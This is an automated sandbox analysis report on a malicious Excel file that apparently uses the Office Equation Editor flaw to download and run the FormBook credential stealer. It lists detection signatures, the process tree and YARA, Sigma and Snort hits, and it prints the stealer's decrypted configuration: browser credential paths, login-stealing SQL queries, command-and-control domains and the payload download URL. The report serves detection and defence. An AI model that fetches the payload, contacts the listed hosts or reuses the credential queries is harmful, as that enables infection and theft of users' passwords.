Loading ...

Play interactive tourEdit tour

Analysis Report 13-01-21.xlsx

Overview

General Information

Sample Name:13-01-21.xlsx
Analysis ID:339203
MD5:43754a8d050bfb5fa1235a90bd89782b
SHA1:8d52c8b3cdb59b6ccd983b3cff5131ad59929bfc
SHA256:0f2085a88aae9e44e3771ddde9c7b1337f25e21416feb4341ffed1a47ccfdf2f
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1244 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2028 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2768 cmdline: 'C:\Users\Public\vbc.exe' MD5: D0B2E715C3E584846F591401035609B4)
      • vbc.exe (PID: 2700 cmdline: C:\Users\Public\vbc.exe MD5: D0B2E715C3E584846F591401035609B4)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 2356 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 2860 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x87d9", "KEY1_OFFSET 0x1c8e5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1c9e5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1b493", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "fundamentaliemef.com", "gallerybrows.com", "leadeligey.com", "octoberx2.online", "climaxnovels.com", "gdsjgf.com", "curateherstories.com", "blacksailus.com", "yjpps.com", "gmobilet.com", "fcoins.club", "foreverlive2027.com", "healthyfifties.com", "wmarquezy.com", "housebulb.com", "thebabyfriendly.com", "primajayaintiperkasa.com", "learnplaychess.com", "chrisbubser.digital", "xn--avenr-wsa.com", "exlineinsurance.com", "thrivezi.com", "tuvandadayvitos24h.online", "illfingers.com", "usmedicarenow.com", "pandabutik.com", "engageautism.info", "magnabeautystyle.com", "texasdryroof.com", "woodlandpizzahartford.com", "dameadamea.com", "sedaskincare.com", "ruaysatu99.com", "mybestaide.com", "nikolaichan.com", "mrcabinetkitchenandbath.com", "ondemandbarbering.com", "activagebenefits.net", "srcsvcs.com", "cbrealvitalize.com", "ismaelworks.com", "medkomp.online", "ninasangtani.com", "h2oturkiye.com", "kolamart.com", "acdfr.com", "twistedtailgatesweeps1.com", "ramjamdee.com", "thedancehalo.com", "joeisono.com", "glasshouseroadtrip.com", "okcpp.com", "riggsfarmfenceservices.com", "mgg360.com", "xn--oi2b190cymc.com", "ctfocbdwholesale.com", "openspiers.com", "rumblingrambles.com", "thepoetrictedstudio.com", "magiclabs.media", "wellnesssensation.com", "lakegastonautoparts.com", "dealsonwheeeles.com", "semenboostplus.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.rizrvd.com/bw82/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2768
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 18.195.87.136, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2028, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2028, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file1[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2768
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2768
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2768

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://18.195.87.136/ttkkz/file1.exeAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.2.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x87d9", "KEY1_OFFSET 0x1c8e5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1c9e5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1b493", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for domain / URLShow sources
          Source: magnabeautystyle.comVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: 13-01-21.xlsxVirustotal: Detection: 30%Perma Link
          Source: 13-01-21.xlsxReversingLabs: Detection: 22%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file1[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.290000.1.unpack
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2208913849.00000000008A9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2208913849.00000000008A9000.00000004.00000020.sdmp
          Source: global trafficDNS query: name: www.usmedicarenow.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 18.195.87.136:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 18.195.87.136:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 18.195.87.136:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 198.185.159.145:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 198.185.159.145:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 198.185.159.145:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 16:20:46 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 13 Jan 2021 09:32:27 GMTETag: "f5e00-5b8c4d146c266"Accept-Ranges: bytesContent-Length: 1007104Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bc bd fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 54 0f 00 00 08 00 00 00 00 00 00 1e 73 0f 00 00 20 00 00 00 80 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 72 0f 00 4b 00 00 00 00 80 0f 00 f0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 